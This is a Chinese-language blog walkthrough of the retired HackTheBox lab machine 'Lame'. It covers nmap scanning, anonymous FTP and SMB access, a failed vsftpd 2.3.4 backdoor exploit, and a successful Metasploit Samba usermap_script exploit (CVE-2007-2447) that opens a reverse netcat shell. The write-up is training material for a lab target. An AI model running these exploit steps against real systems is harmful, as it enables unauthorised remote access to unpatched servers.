HackTheBox: Lame [vsFTPd 与 Samba历史漏洞]

January 13, 2024

504 views

3642 words

2024-01-13T14:21:16.png

信息
系统	Linux
难度	Easy
状态	退役
IP	10.10.10.3
靶机地址	https://app.hackthebox.com/machines/1

Easy
10.10.10.3

Smaba历史漏洞 CVE-2007-2447

Nmap

root@koi:~/Hackthebox/Lame# nmap 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-13 18:20 CST
Nmap scan report for 10.10.10.3
Host is up (0.0033s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-13 18:23 CST
Nmap scan report for 10.10.10.3
Host is up (0.0029s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP_21端口

匿名登陆

└─\ ✨ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:st4rry): Anonymous
331 Please specify the password.
Password:
230 Login successful.

啥也没有
vsFTP v2.3.4存在历史漏洞,这里使用 msfconsole 尝试

当用户名一:)结束是,会开启后门端口 6200

└─\ ✨ msfconsole -q
msf6 > search vsFTP 2.3.4
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

漏洞利用失败(被防火墙拦截),看看其他端口

Samba_139和445端口

匿名登陆

查看可以访问的目录

└─\ ✨ smbclient -L 10.10.10.3
Password for [WORKGROUP\st4rry]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))  
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))  
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
        Server               Comment
        ---------            -------
        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

版本号为3.0.20
使用msfconsole -q

└─\ ✨ msfconsole -q
msf6 > search samba 3.0.20
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.16.21
lhost => 10.10.16.21
msf6 exploit(multi/samba/usermap_script) > run
成功利用

HackTheBox: Lame [vsFTPd 与 Samba历史漏洞]

Nmap

FTP_21端口

匿名登陆

Samba_139和445端口

匿名登陆

更多利用

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

HackTheBox: Lame [vsFTPd 与 Samba历史漏洞]

Nmap

FTP_21端口

匿名登陆

Samba_139和445端口

匿名登陆

更多利用

Leave a Comment Cancel reply 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

HackTheBox: Lame [vsFTPd 与 Samba历史漏洞]

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款